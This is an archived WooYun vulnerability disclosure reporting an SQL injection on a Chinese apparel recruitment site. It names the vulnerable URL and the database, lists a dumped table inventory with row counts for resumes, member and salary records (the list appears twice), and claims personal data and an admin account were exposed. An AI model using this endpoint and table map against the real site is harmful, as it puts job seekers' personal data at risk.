中国服装人才官网某站SQL注入打包(涉及百万用户数据/简历信息等)

2017年4月23日12:26:21评论386 views字数 222阅读0分44秒阅读模式

摘要

2016-04-09：细节已通知厂商并且等待厂商处理中
2016-04-09：厂商已经确认，细节仅向厂商公开
2016-04-19：细节向核心白帽子及相关领域专家公开
2016-04-29：细节向普通白帽子公开
2016-05-09：细节向实习白帽子公开
2016-05-24：细节向公众公开

漏洞概要关注数(7) 关注此漏洞

缺陷编号： WooYun-2016-186040

漏洞标题：中国服装人才官网某站SQL注入打包(涉及百万用户数据/简历信息等)

漏洞作者：黑色键盘丶

提交时间： 2016-04-09 10:00

公开时间： 2016-05-24 11:40

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 14

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：注射技巧

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

code 区域

http://expo.cfw.cn/zhlist.aspx?year=0&month=0&hy=1&pg=1

主库newsfzrcw 主站的库

表

code 区域

Database: newfzrcw
 +------------------------------------+---------+
 | Table                              | Entries |
 +------------------------------------+---------+
 | dbo.personal_member_trace          | 4539453 |
 | dbo.jifen_xiaofei                  | 3391089 |
 | dbo.enter_accept                   | 2585838 |
 | dbo.enterprise_accept              | 2585836 |
 | dbo.enter_accept_resume            | 2584522 |
 | dbo.enter_accept_resume_oa         | 2584522 |
 | dbo.enter_accept_member            | 2584373 |
 | dbo.ck_resume                      | 2582322 |
 | dbo.enter_inv_acc_view             | 2546306 |
 | dbo.enter_accept_views             | 2545581 |
 | dbo.sql_temp                       | 2533057 |
 | dbo.ck_resume_cishu                | 1941096 |
 | dbo.ckresume_ehr_view              | 1934601 |
 | dbo.personal_lx_bak                | 1208661 |
 | dbo.persnoal_lxupdate_view         | 1206411 |
 | dbo.personal_log                   | 1155741 |
 | dbo.huifang                        | 935792  |
 | dbo.yw_hf_enter                    | 935789  |
 | dbo.personal_member                | 910551  |
 | dbo.resume_information             | 653095  |
 | dbo.personal_pipeiauto_view        | 652781  |
 | dbo.TempQRCodes                    | 635709  |
 | dbo.view_personal_unresume         | 631011  |
 | dbo.resume_view_order              | 614788  |
 | dbo.friend_dynamic                 | 612086  |
 | dbo.resume_gzjl2                   | 592087  |
 | dbo.resume_gzjl_view               | 577938  |
 | dbo.expo_ckjl                      | 559168  |
 | dbo.expo_user_ckjl                 | 559006  |
 | dbo.art_view_list                  | 528126  |
 | dbo.enter_down                     | 490603  |
 | dbo.enter_down_resume_view         | 490263  |
 | dbo.link_from_email                | 453140  |
 | dbo.resume_edu2                    | 410151  |
 | dbo.zw_keyword                     | 385067  |
 | dbo.oa_yw_hfcount                  | 371136  |
 | dbo.enterprise_cost                | 366519  |
 | dbo.enterprise_cost_view           | 366072  |
 | dbo.enter_personal_cost_view       | 365389  |
 | dbo.enter_cost_view                | 365339  |
 | dbo.dy_zhoukan_email               | 343341  |
 | dbo.user_dit                       | 335109  |
 | dbo.Weixin_Record                  | 294940  |
 | dbo.enterprise_invite              | 272299  |
 | dbo.qy_order                       | 261331  |
 | dbo.guzhu_hr_tp                    | 260633  |
 | dbo.resume_photo                   | 253333  |
 | dbo.enterprise_ck                  | 217020  |
 | dbo.zw_keyword_list                | 206990  |
 | dbo.view_resume21                  | 185746  |
 | dbo.job_favorite                   | 167983  |
 | dbo.a_rec                          | 153574  |
 | dbo.gbook_about                    | 145727  |
 | dbo.resume_hf                      | 125270  |
 | dbo.personal_resume_hfview         | 124977  |
 | dbo.oa_admins_view_resume          | 121637  |
 | dbo.ehr_member_invite_view         | 117586  |
 | dbo.enter_invite_member            | 117586  |
 | dbo.enter_zw_fuli_view             | 117586  |
 | dbo.art_toupiaolist                | 113656  |
 | dbo.resume_resumetagView           | 104517  |
 | dbo.resume_Language                | 101031  |
 | dbo.enterprise_section             | 99762   |
 | dbo.enter_search_history           | 99077   |
 | dbo.yaoqing                        | 98637   |
 | dbo.yaoqing_resume_view            | 98365   |
 | dbo.enter_operation_log            | 95859   |
 | dbo.qy_yaoqing_view                | 93505   |
 | dbo.qy_yaoqing_personal_view       | 93335   |
 | dbo.qy_yaoqing_resume_view         | 93237   |
 | dbo.cfw_news                       | 91163   |
 | dbo.cfw_news_typenameView          | 90936   |
 | dbo.resume_waprecord               | 89152   |
 | dbo.index_UPDATE_ids               | 87664   |
 | dbo.enterprise_log                 | 87058   |
 | dbo.edu_user                       | 84073   |
 | dbo.enter_fq_member_view           | 81075   |
 | dbo.enter_fq_view                  | 81075   |
 | dbo.enter_contacts                 | 79005   |
 | dbo.enter_fq_admin_view            | 78382   |
 | dbo.personal_pass_zh               | 77647   |
 | dbo.enterprise_member              | 76394   |
 | dbo.view_company                   | 76394   |
 | dbo.enteroperationlog_resume_view  | 74618   |
 | dbo.enterprise_talented_person     | 74469   |
 | dbo.enter_store_view               | 74168   |
 | dbo.temp_enterprises               | 72847   |
 | dbo.office_sz                      | 70434   |
 | dbo.view_invite                    | 66093   |
 | dbo.xml_enter_member_invite_view   | 66066   |
 | dbo.resume_othertl                 | 65920   |
 | dbo.SM                             | 65419   |
 | dbo.resume_train                   | 65332   |
 | dbo.my_show                        | 60068   |
 | dbo.view_art                       | 60068   |
 | dbo.enter_sms                      | 60002   |
 | dbo.my_show_xuyuan_view            | 59361   |
 | dbo.enterprise_lx_bak              | 56139   |
 | dbo.personal_message               | 52706   |
 | dbo.survey_qy                      | 52131   |
 | dbo.oa_rizhi                       | 51657   |
 | dbo.resume_qzyx                    | 48271   |
 | dbo.personal_salary                | 47602   |
 | dbo.oa_rizhi_cklist                | 47188   |
 | dbo.cfw_salary_all                 | 46146   |
 | dbo.enterprise_openbaidu           | 42493   |
 | dbo.Desktop                        | 41063   |
 | dbo.adv_click                      | 40801   |
 | dbo.trackback                      | 39149   |
 | dbo.dy_zhoukan                     | 36676   |
 | dbo.resume_ability                 | 35666   |
 | dbo.oa_input_list                  | 34006   |
 | dbo.my_show_ding                   | 30289   |
 | dbo.guzhu_meiti                    | 28339   |
 | dbo.OptionName                     | 28267   |
 | dbo.baihuolingshou                 | 27225   |
 | dbo.resume_pingbi                  | 25877   |
 | dbo.yaoqing_content                | 25044   |
 | dbo.fw_user                        | 24584   |
 | dbo.edu_tplist                     | 24270   |
 | dbo.oa_enter_fenpei                | 23789   |
 | dbo.oa_fenpei_member               | 23780   |
 | dbo.adv_home_bak                   | 23608   |
 | dbo.oa_plan_week_list              | 21750   |
 | dbo.blog                           | 21150   |
 | dbo.sunysms_p                      | 20857   |
 | dbo.lietou_resume                  | 19787   |
 | dbo.hn_hfview                      | 19238   |
 | dbo.adv_home_notnull_view          | 18115   |
 | dbo.adv_home_notnull_view_fb2      | 18115   |
 | dbo.Temp_gzjl                      | 17504   |
 | dbo.job_m_1                        | 17457   |
 | dbo.resume_pg                      | 17252   |
 | dbo.pg_enter_cost_view             | 16150   |
 | dbo.enter_pg_order                 | 15187   |
 | dbo.lt_resume_ck                   | 14844   |
 | dbo.enter_pg_order_view            | 14827   |
 | dbo.enter_invite_mb                | 14800   |
 | dbo.pg_enter_down_resume_view      | 13982   |
 | dbo.MBTI_answer                    | 13740   |
 | dbo.enter_invite_bak               | 13366   |
 | dbo.blog_user_setting              | 12957   |
 | dbo.QYXUQIU2013                    | 12350   |
 | dbo.my_show_comment                | 12110   |
 | dbo.blog_user_link                 | 10652   |
 | dbo.zhishu_data                    | 10571   |
 | dbo.art_score                      | 10502   |
 | dbo.expo_company                   | 10358   |
 | dbo.expo_company_main              | 10358   |
 | dbo.personal_yanzheng              | 10139   |
 | dbo.enterprise_hits                | 9477    |
 | dbo.blog_photo                     | 9441    |
 | dbo.OpenIds                        | 9239    |
 | dbo.wailian_dengji                 | 9197    |
 | dbo.resume_in                      | 9122    |
 | dbo.ItemTable                      | 8896    |
 | dbo.enter_hot_list                 | 8308    |
 | dbo.personal_service_history       | 7760    |
 | dbo.VIEW_art_resume_all            | 7599    |
 | dbo.enterprise_server              | 7413    |
 | dbo.enter_sms_list                 | 7370    |
 | dbo.ask2                           | 7321    |
 | dbo.enter_fw_history               | 7212    |
 | dbo.adv_home_notnull_view_fb1      | 6993    |
 | dbo.xc_personal                    | 6970    |
 | dbo.personalxc_view                | 6911    |
 | dbo.ask1                           | 6881    |
 | dbo.show_tag                       | 6822    |
 | dbo.lietou_resume_hf               | 6817    |
 | dbo.quick_talented_resume          | 6709    |
 | dbo.enterprise_search              | 6666    |
 | dbo.enter_Favorite                 | 6062    |
 | dbo.FavoriteResumes_view           | 5712    |
 | dbo.guzhu_tp                       | 5583    |
 | dbo.RENCAIXUQIU2013                | 5577    |
 | dbo.lt_JianLi                      | 5533    |
 | dbo.oa_message_ckz                 | 5510    |
 | dbo.show_card                      | 5470    |
 | dbo.art_pinglun_view               | 5161    |
 | dbo.ck_resume_ly                   | 5076    |
 | dbo.enter_member_hf                | 5072    |
 | dbo.edu_word                       | 5038    |
 | dbo.lingshourc                     | 5000    |
 | dbo.resumenews_view                | 5000    |
 | dbo.enter_pg_gbook                 | 4742    |
 | dbo.enter_talk_bm                  | 4712    |
 | dbo.cfw_zhzt                       | 4411    |
 | dbo.resume_dianping                | 4371    |
 | dbo.enter_pg_gbook_view            | 4348    |
 | dbo.ehr_pg_gbook_member            | 4343    |
 | dbo.test_Content                   | 4102    |
 | dbo.weixin_tuijian                 | 4052    |
 | dbo.eng_resume                     | 3962    |
 | dbo.blog_message                   | 3852    |
 | dbo.oa_plan_week                   | 3767    |
 | dbo.subject                        | 3559    |
 | dbo.comment                        | 3514    |
 | dbo.pg_enter_store_view            | 3511    |
 | dbo.enter_lxbak_view               | 3505    |
 | dbo.edu_information                | 3503    |
 | dbo.gbook_news                     | 3397    |
 | dbo.hf_sw_view                     | 3318    |
 | dbo.kf_hfview_3                    | 3318    |
 | dbo.edu_member_zhaopinhui          | 3311    |
 | dbo.kf_hf_view                     | 3273    |
 | dbo.kf_hfview_2                    | 3273    |
 | dbo.personal_dingdan               | 3196    |
 | dbo.resume_gzjl                    | 3181    |
 | dbo.expo_user_log                  | 3124    |
 | dbo.VIEW_art_resume                | 3086    |
 | dbo.point_adv                      | 3079    |
 | dbo.EmployeeEnterpriseRegions      | 3072    |
 | dbo.blog_myfriend                  | 3030    |
 | dbo.enterprise_pg                  | 3027    |
 | dbo.email_record                   | 2959    |
 | salary.records                     | 2948    |
 | dbo.personal_chongzhi              | 2806    |
 | dbo.adv_home                       | 2779    |
 | dbo.tb_kc                          | 2749    |
 | dbo.art_comment                    | 2722    |
 | dbo.art_user_gbook                 | 2690    |
 | dbo.enter_member_pg_view           | 2656    |
 | dbo.blog_sys_message               | 2640    |
 | dbo.wsbm                           | 2482    |
 | dbo.personal_service               | 2474    |
 | dbo.resume_wf                      | 2246    |
 | dbo.blog_phototype                 | 2227    |
 | dbo.Expo_main                      | 2125    |
 | dbo.qiye_pingpai                   | 2072    |
 | dbo.personal_srczph                | 1966    |
 | dbo.oa_plan_month_list1            | 1954    |
 | dbo.DIAOYAN_GUYUAN2013             | 1872    |
 | dbo.model_comment                  | 1803    |
 | dbo.adv_home_ehr_dq_view           | 1792    |
 | dbo.cfw_count                      | 1776    |
 | dbo.lietou_rc                      | 1707    |
 | dbo.enter_member_service           | 1698    |
 | dbo.pugong_success_view            | 1649    |
 | dbo.mobile_nz                      | 1635    |
 | dbo.lt_resume                      | 1614    |
 | dbo.enterprise_talented_stores     | 1541    |
 | dbo.enter_pro_buy                  | 1514    |
 | dbo.personal_gwc                   | 1481    |
 | dbo.edu_huifang                    | 1476    |
 | dbo.book_dingdan                   | 1460    |
 | dbo.quan_fwz                       | 1447    |
 | dbo.guzhu_hr_review                | 1417    |
 | dbo.enter_pg_accept                | 1416    |
 | dbo.edu_news_review                | 1387    |
 | dbo.oa_plan_week_uqd               | 1340    |
 | dbo.enter_pg_service_view          | 1337    |
 | dbo.pk_tp                          | 1330    |
 | dbo.enter_zpzt                     | 1316    |
 | dbo.pg_accept_resume               | 1291    |
 | dbo.edu_about_gbook                | 1266    |
 | dbo.Verification                   | 1223    |
 | dbo.resume_edu                     | 1211    |
 | dbo.enter_job_email_service        | 1201    |
 | dbo.lietou_order                   | 1149    |
 | dbo.Temp_srczph_toupiao            | 1096    |
 | dbo.oa_plan_month                  | 1084    |
 | dbo.edu_member                     | 1061    |
 | dbo.personal_zj_temp               | 1035    |
 | dbo.personal_zfjl                  | 1014    |
 | dbo.edu_from_email                 | 983     |
 | dbo.edu_a_rec                      | 917     |
 | dbo.wenjuan_salarycount            | 912     |
 | dbo.SurveyName                     | 906     |
 | dbo.book_name                      | 887     |
 | dbo.guzhu_baoming                  | 875     |
 | dbo.my_show_vod                    | 848     |
 | dbo.lietou_zhiwei                  | 842     |
 | dbo.telhj                          | 840     |
 | dbo.edu_news                       | 810     |
 | dbo.model_photo                    | 805     |
 | dbo.VIEW_active                    | 796     |
 | dbo.VIEW_resume_personal           | 796     |
 | dbo.expo_user                      | 740     |
 | dbo.nearkeys                       | 719     |
 | dbo.ywhfview                       | 718     |
 | dbo.oa_salestable                  | 716     |
 | dbo.guzhu_pinglun                  | 692     |
 | dbo.guzhu_club                     | 658     |
 | dbo.post_xiangguan                 | 649     |
 | dbo.enterprise_news                | 623     |
 | dbo.oa_message                     | 619     |
 | dbo.enter_hd_view                  | 605     |
 | dbo.my_show_piaoshu_view           | 600     |
 | dbo.[Job-matching-email]           | 587     |
 | dbo.link                           | 543     |
 | dbo.enterprise_invite_temp         | 538     |
 | dbo.cat                            | 535     |
 | dbo.blogteam                       | 498     |
 | dbo.feedback                       | 498     |
 | dbo.enterprise_zhuanfa             | 489     |
 | dbo.review                         | 488     |
 | dbo.lietou_rc_ck                   | 479     |
 | dbo.lietou_apply                   | 469     |
 | dbo.edu_college                    | 452     |
 | dbo.OA_words                       | 450     |
 | dbo.edu_fc                         | 434     |
 | dbo.invest_1485                    | 426     |
 | dbo.salary_bm                      | 409     |
 | dbo.cfw_pictures                   | 408     |
 | dbo.book_collection                | 403     |
 | dbo.weixin_dingyue                 | 394     |
 | dbo.lietou_zw_rc                   | 383     |
 | dbo.city_entrance                  | 379     |
 | dbo.fashion_gm                     | 374     |
 | dbo.e_city_entrance                | 370     |
 | dbo.edu_course                     | 370     |
 | dbo.oa_news                        | 360     |
 | dbo.blog_photo_comment             | 355     |
 | dbo.quan                           | 348     |
 | dbo.kehu_gy                        | 309     |
 | dbo.yao_hf                         | 308     |
 | dbo.q_bbs                          | 299     |
 | dbo.post_sort                      | 297     |
 | dbo.oa_enter_alarm                 | 290     |
 | dbo.wailian_luntan                 | 290     |
 | dbo.enter_zlt_reson                | 287     |
 | dbo.hetong                         | 287     |
 | dbo.book_order_ks                  | 280     |
 | dbo.salary_bm_hf                   | 271     |
 | dbo.weixin_huojiang                | 270     |
 | dbo.enter_kh_pj                    | 256     |
 | dbo.post_seosort                   | 254     |
 | dbo.server_order                   | 252     |
 | dbo.gbook_kplan                    | 248     |
 | dbo.zhuhe_5year                    | 245     |
 | dbo.art_dsjg                       | 235     |
 | dbo.train_kcs                      | 233     |
 | dbo.zhishu_data_gd                 | 232     |
 | dbo.BrandSort                      | 221     |
 | dbo.Temp_srczph_number             | 220     |
 | dbo.expo_user_cost                 | 216     |
 | dbo.expo_user_xiaofei              | 216     |
 | dbo.adv_sort                       | 213     |
 | dbo.enterprise_chongzhi            | 211     |
 | dbo.oa_plan_month_plan             | 199     |
 | dbo.tel_hf                         | 195     |
 | dbo.guzhu_hr                       | 192     |
 | dbo.lietou_class_job               | 188     |
 | dbo.oa_feedback                    | 186     |
 | dbo.hr_zk_mail                     | 183     |
 | dbo.OA_admins                      | 180     |
 | dbo.post_name                      | 178     |
 | dbo.enterprise_emember             | 172     |
 | dbo.video_resume                   | 169     |
 | dbo.asphtml                        | 166     |
 | dbo.ks_zhaopin                     | 165     |
 | dbo.MBTI_result                    | 160     |
 | dbo.art_user_type                  | 149     |
 | dbo.news_smallclass                | 137     |
 | dbo.qiye_salary                    | 136     |
 | dbo.freshing_feedback              | 132     |
 | dbo.edu_sort                       | 126     |
 | dbo.tb_users                       | 125     |
 | dbo.resume_mishu_view              | 123     |
 | dbo.train_kc_xs                    | 121     |
 | dbo.edu_wsbm                       | 120     |
 | dbo.tb_sort                        | 117     |
 | dbo.edu_coop                       | 116     |
 | dbo.apply_design                   | 105     |
 | dbo.edu_infos                      | 105     |
 | dbo.brand_title                    | 101     |
 | dbo.art_select                     | 100     |
 | dbo.show_card_hf                   | 99      |
 | dbo.eng_enter_invite               | 97      |
 | dbo.enter_tb_users                 | 94      |
 | dbo.MBTI_questions                 | 94      |
 | dbo.enter_sxy_view                 | 92      |
 | dbo.dc_personal                    | 91      |
 | dbo.personal_dc_view               | 91      |
 | dbo.enter_hd_hf                    | 89      |
 | dbo.enterprise_section_member      | 89      |
 | dbo.lietou_zw                      | 89      |
 | dbo.oa_website                     | 88      |
 | dbo.personal_service_temp          | 86      |
 | dbo.dc                             | 81      |
 | dbo.enter_feedback                 | 81      |
 | dbo.Temp_srczph_choujiang          | 76      |
 | dbo.oa_yw_hflist                   | 75      |
 | dbo.guzhu_qypic                    | 73      |
 | dbo.zhishu_cont                    | 71      |
 | dbo.jobSort                        | 69      |
 | dbo.book_word                      | 63      |
 | dbo.rcly_hf                        | 62      |
 | dbo.pk_pinglun                     | 61      |
 | dbo.edu_link                       | 60      |
 | dbo.guzhu_temp_bm                  | 59      |
 | dbo.lt_ZhiWei_Code                 | 58      |
 | dbo.train_bm                       | 58      |
 | dbo.edu_school                     | 56      |
 | dbo.enter_pg_service               | 56      |
 | dbo.office_lx                      | 56      |
 | dbo.cfw_category                   | 55      |
 | dbo.oa_news_sort                   | 55      |
 | dbo.webjob_admin_ip                | 55      |
 | dbo.edu_xyds_bm                    | 54      |
 | dbo.korea_resume_gbook             | 51      |
 | dbo.brand_adv                      | 50      |
 | dbo.edu_honor                      | 50      |
 | dbo.oa_admins_phone                | 50      |
 | dbo.xyzp_resume_view               | 50      |
 | dbo.domain_purchase                | 47      |
 | dbo.edu_member_adv                 | 47      |
 | dbo.hr_news_type                   | 47      |
 | dbo.lietou_qy                      | 47      |
 | dbo.art_club_links                 | 46      |
 | dbo.book_order                     | 46      |
 | dbo.enter_pg_sort                  | 46      |
 | dbo.oa_leadmail                    | 46      |
 | dbo.q_gbook                        | 46      |
 | dbo.cfw_select                     | 45      |
 | dbo.book_sort                      | 43      |
 | dbo.dc_ehr                         | 43      |
 | dbo.hr_club                        | 42      |
 | dbo.tb_type                        | 42      |
 | dbo.edu_cat                        | 40      |
 | dbo.enter_dc_view                  | 39      |
 | dbo.SmallClass                     | 39      |
 | dbo.enter_fuli                     | 38      |
 | dbo.my_show_vod_type               | 38      |
 | dbo.lietou_qy_hf                   | 36      |
 | dbo.train_kc_type                  | 35      |
 | dbo.user_honor                     | 35      |
 | dbo.korea_resume                   | 34      |
 | dbo.my_show_buy                    | 34      |
 | dbo.enter_pg_gbook_hf              | 33      |
 | dbo.Ft_sqlin                       | 32      |
 | dbo.link_sort                      | 32      |
 | dbo.adv_home_hot_view              | 31      |
 | dbo.p_home_page                    | 31      |
 | dbo.enter_post_server              | 30      |
 | dbo.classname                      | 29      |
 | dbo.expo_type                      | 29      |
 | dbo.jifen_set                      | 29      |
 | dbo.wx_shouji                      | 28      |
 | dbo.edu_style                      | 27      |
 | dbo.blog_abtype                    | 26      |
 | dbo.lietou_sort                    | 26      |
 | dbo.userskin                       | 26      |
 | dbo.enterprise_service_info        | 24      |
 | dbo.edu_adv_home                   | 23      |
 | dbo.edu_Lecturer                   | 23      |
 | dbo.find                           | 23      |
 | dbo.book_comment                   | 21      |
 | dbo.college_pingxuan               | 21      |
 | dbo.expo_user_hf                   | 21      |
 | dbo.hy_type                        | 21      |
 | dbo.haiwai_apply                   | 20      |
 | dbo.pk_info                        | 20      |
 | dbo.lecture_article                | 19      |
 | dbo.art_dsort                      | 18      |
 | dbo.enterperise_jobdetail_template | 17      |
 | dbo.gbook_news_hf                  | 17      |
 | dbo.Lecturer_sort                  | 17      |
 | dbo.news_bigclass                  | 17      |
 | dbo.zj_type                        | 17      |
 | dbo.blog_type                      | 16      |
 | dbo.lietou_word                    | 16      |
 | dbo.MBTI_instruction               | 16      |
 | dbo.OA_depart                      | 16      |
 | dbo.edu_member_type                | 15      |
 | dbo.edu_news_sort                  | 15      |
 | dbo.oa_fq_sort                     | 15      |
 | dbo.pagestyle                      | 15      |
 | dbo.edu_gbook                      | 14      |
 | dbo.enter_kc_sort_view             | 14      |
 | dbo.enter_tb_kc                    | 14      |
 | dbo.fashion_art_comment            | 14      |
 | dbo.guzhu_club_pic                 | 14      |
 | dbo.video_company                  | 14      |
 | dbo.zt_type                        | 14      |
 | dbo.jobpg_favorite                 | 13      |
 | dbo.oa_website_sort                | 13      |
 | dbo.art_design_type                | 12      |
 | dbo.sort                           | 12      |
 | dbo.DefineCode                     | 11      |
 | dbo.edu_links                      | 11      |
 | dbo.edu_pxbm                       | 11      |
 | dbo.email_test                     | 11      |
 | dbo.oa_feedback_hf                 | 11      |
 | dbo.Vote                           | 11      |
 | dbo.friend_sort                    | 10      |
 | dbo.personal_product               | 10      |
 | dbo.resume_skill                   | 10      |
 | dbo.usertype                       | 10      |
 | dbo.selects                        | 9       |
 | dbo.show_card_sort                 | 9       |
 | dbo.video_type                     | 9       |
 | dbo.dclass                         | 8       |
 | dbo.expo_user_service_jl           | 8       |
 | dbo.lecture_file                   | 8       |
 | dbo.maintemp                       | 8       |
 | dbo.OA_zw                          | 8       |
 | dbo.personal_sms_list              | 8       |
 | dbo.pk_type                        | 8       |
 | dbo.surv_type                      | 8       |
 | dbo.enter_pro_type                 | 7       |
 | dbo.invest_sort                    | 7       |
 | dbo.lietou_zw_bak                  | 7       |
 | dbo.network_zph                    | 7       |
 | dbo.survey_ehr_fw                  | 7       |
 | dbo.train_bbs                      | 7       |
 | dbo.art_type                       | 6       |
 | dbo.edu_study                      | 6       |
 | dbo.enter_hd_type                  | 6       |
 | dbo.guzhu_dsort                    | 6       |
 | dbo.oa_kftype                      | 6       |
 | dbo.shop_help                      | 6       |
 | dbo.Template                       | 6       |
 | dbo.edu_admin                      | 5       |
 | dbo.Expo_hy_type                   | 5       |
 | dbo.Expo_lb_type                   | 5       |
 | dbo.expo_user_chongzhi             | 5       |
 | dbo.expo_user_type                 | 5       |
 | dbo.guzhu_news                     | 5       |
 | dbo.oa_news_gbook                  | 5       |
 | dbo.ProtectionIgnoreDays           | 5       |
 | dbo.survey_per_fw                  | 5       |
 | dbo.sysskin                        | 5       |
 | dbo.vod_type                       | 5       |
 | dbo.blog_mb_back                   | 4       |
 | dbo.blog_mtype                     | 4       |
 | dbo.book_gong                      | 4       |
 | dbo.edu_adv_sort                   | 4       |
 | dbo.Expo_Submit                    | 4       |
 | dbo.hr_club_type                   | 4       |
 | dbo.edu_link_sort                  | 3       |
 | dbo.edu_zj                         | 3       |
 | dbo.ehr_pingbi                     | 3       |
 | dbo.enter_feedback_hf              | 3       |
 | dbo.enter_sms_mb                   | 3       |
 | dbo.lietou_topic_gbook             | 3       |
 | dbo.q_type                         | 3       |
 | dbo.user_grade                     | 3       |
 | dbo.book_type                      | 2       |
 | dbo.chongzhi                       | 2       |
 | dbo.edu_favorites                  | 2       |
 | dbo.edu_oamessage_ckz              | 2       |
 | dbo.eng_enter_accept_resume        | 2       |
 | dbo.eng_enterprise_accept          | 2       |
 | dbo.itpro                          | 2       |
 | dbo.lieshou_pj                     | 2       |
 | dbo.personal_pro_sort              | 2       |
 | dbo.VoteType                       | 2       |
 | dbo.__MigrationHistory             | 1       |
 | dbo.adv                            | 1       |
 | dbo.bloginfo                       | 1       |
 | dbo.bottom                         | 1       |
 | dbo.down_resume                    | 1       |
 | dbo.edu_message                    | 1       |
 | dbo.eng_enterprise_member          | 1       |
 | dbo.eng_huifang                    | 1       |
 | dbo.enterprise_pingpai             | 1       |
 | dbo.filtrate                       | 1       |
 | dbo.freshing_jilu                  | 1       |
 | dbo.guzhu_content                  | 1       |
 | dbo.hr_tool                        | 1       |
 | dbo.invest_1320                    | 1       |
 | dbo.invest_1321                    | 1       |
 | dbo.invest_1322                    | 1       |
 | dbo.invest_1324                    | 1       |
 | dbo.invest_1328                    | 1       |
 | dbo.invest_1330                    | 1       |
 | dbo.invest_1331                    | 1       |
 | dbo.invest_1333                    | 1       |
 | dbo.invest_1339                    | 1       |
 | dbo.lietou_qy_service              | 1       |
 | dbo.lietou_rc_hf                   | 1       |
 | dbo.lockip                         | 1       |
 | dbo.lt_resume_hf                   | 1       |
 | dbo.oa_onlyLogin                   | 1       |
 | dbo.shop_news                      | 1       |
 | dbo.xcconfig                       | 1       |
 | dbo.zh_guo                         | 1       |
 | dbo.zhishu_left                    | 1       |
 +------------------------------------+---------+

数据

oa系统管理员

家庭住址等各种都泄露我这里就不一个一个跑了

漏洞证明：

code 区域

http://expo.cfw.cn/zhlist.aspx?year=0&month=0&hy=1&pg=1

主库newsfzrcw 主站的库

表

code 区域

Database: newfzrcw
 +------------------------------------+---------+
 | Table                              | Entries |
 +------------------------------------+---------+
 | dbo.personal_member_trace          | 4539453 |
 | dbo.jifen_xiaofei                  | 3391089 |
 | dbo.enter_accept                   | 2585838 |
 | dbo.enterprise_accept              | 2585836 |
 | dbo.enter_accept_resume            | 2584522 |
 | dbo.enter_accept_resume_oa         | 2584522 |
 | dbo.enter_accept_member            | 2584373 |
 | dbo.ck_resume                      | 2582322 |
 | dbo.enter_inv_acc_view             | 2546306 |
 | dbo.enter_accept_views             | 2545581 |
 | dbo.sql_temp                       | 2533057 |
 | dbo.ck_resume_cishu                | 1941096 |
 | dbo.ckresume_ehr_view              | 1934601 |
 | dbo.personal_lx_bak                | 1208661 |
 | dbo.persnoal_lxupdate_view         | 1206411 |
 | dbo.personal_log                   | 1155741 |
 | dbo.huifang                        | 935792  |
 | dbo.yw_hf_enter                    | 935789  |
 | dbo.personal_member                | 910551  |
 | dbo.resume_information             | 653095  |
 | dbo.personal_pipeiauto_view        | 652781  |
 | dbo.TempQRCodes                    | 635709  |
 | dbo.view_personal_unresume         | 631011  |
 | dbo.resume_view_order              | 614788  |
 | dbo.friend_dynamic                 | 612086  |
 | dbo.resume_gzjl2                   | 592087  |
 | dbo.resume_gzjl_view               | 577938  |
 | dbo.expo_ckjl                      | 559168  |
 | dbo.expo_user_ckjl                 | 559006  |
 | dbo.art_view_list                  | 528126  |
 | dbo.enter_down                     | 490603  |
 | dbo.enter_down_resume_view         | 490263  |
 | dbo.link_from_email                | 453140  |
 | dbo.resume_edu2                    | 410151  |
 | dbo.zw_keyword                     | 385067  |
 | dbo.oa_yw_hfcount                  | 371136  |
 | dbo.enterprise_cost                | 366519  |
 | dbo.enterprise_cost_view           | 366072  |
 | dbo.enter_personal_cost_view       | 365389  |
 | dbo.enter_cost_view                | 365339  |
 | dbo.dy_zhoukan_email               | 343341  |
 | dbo.user_dit                       | 335109  |
 | dbo.Weixin_Record                  | 294940  |
 | dbo.enterprise_invite              | 272299  |
 | dbo.qy_order                       | 261331  |
 | dbo.guzhu_hr_tp                    | 260633  |
 | dbo.resume_photo                   | 253333  |
 | dbo.enterprise_ck                  | 217020  |
 | dbo.zw_keyword_list                | 206990  |
 | dbo.view_resume21                  | 185746  |
 | dbo.job_favorite                   | 167983  |
 | dbo.a_rec                          | 153574  |
 | dbo.gbook_about                    | 145727  |
 | dbo.resume_hf                      | 125270  |
 | dbo.personal_resume_hfview         | 124977  |
 | dbo.oa_admins_view_resume          | 121637  |
 | dbo.ehr_member_invite_view         | 117586  |
 | dbo.enter_invite_member            | 117586  |
 | dbo.enter_zw_fuli_view             | 117586  |
 | dbo.art_toupiaolist                | 113656  |
 | dbo.resume_resumetagView           | 104517  |
 | dbo.resume_Language                | 101031  |
 | dbo.enterprise_section             | 99762   |
 | dbo.enter_search_history           | 99077   |
 | dbo.yaoqing                        | 98637   |
 | dbo.yaoqing_resume_view            | 98365   |
 | dbo.enter_operation_log            | 95859   |
 | dbo.qy_yaoqing_view                | 93505   |
 | dbo.qy_yaoqing_personal_view       | 93335   |
 | dbo.qy_yaoqing_resume_view         | 93237   |
 | dbo.cfw_news                       | 91163   |
 | dbo.cfw_news_typenameView          | 90936   |
 | dbo.resume_waprecord               | 89152   |
 | dbo.index_UPDATE_ids               | 87664   |
 | dbo.enterprise_log                 | 87058   |
 | dbo.edu_user                       | 84073   |
 | dbo.enter_fq_member_view           | 81075   |
 | dbo.enter_fq_view                  | 81075   |
 | dbo.enter_contacts                 | 79005   |
 | dbo.enter_fq_admin_view            | 78382   |
 | dbo.personal_pass_zh               | 77647   |
 | dbo.enterprise_member              | 76394   |
 | dbo.view_company                   | 76394   |
 | dbo.enteroperationlog_resume_view  | 74618   |
 | dbo.enterprise_talented_person     | 74469   |
 | dbo.enter_store_view               | 74168   |
 | dbo.temp_enterprises               | 72847   |
 | dbo.office_sz                      | 70434   |
 | dbo.view_invite                    | 66093   |
 | dbo.xml_enter_member_invite_view   | 66066   |
 | dbo.resume_othertl                 | 65920   |
 | dbo.SM                             | 65419   |
 | dbo.resume_train                   | 65332   |
 | dbo.my_show                        | 60068   |
 | dbo.view_art                       | 60068   |
 | dbo.enter_sms                      | 60002   |
 | dbo.my_show_xuyuan_view            | 59361   |
 | dbo.enterprise_lx_bak              | 56139   |
 | dbo.personal_message               | 52706   |
 | dbo.survey_qy                      | 52131   |
 | dbo.oa_rizhi                       | 51657   |
 | dbo.resume_qzyx                    | 48271   |
 | dbo.personal_salary                | 47602   |
 | dbo.oa_rizhi_cklist                | 47188   |
 | dbo.cfw_salary_all                 | 46146   |
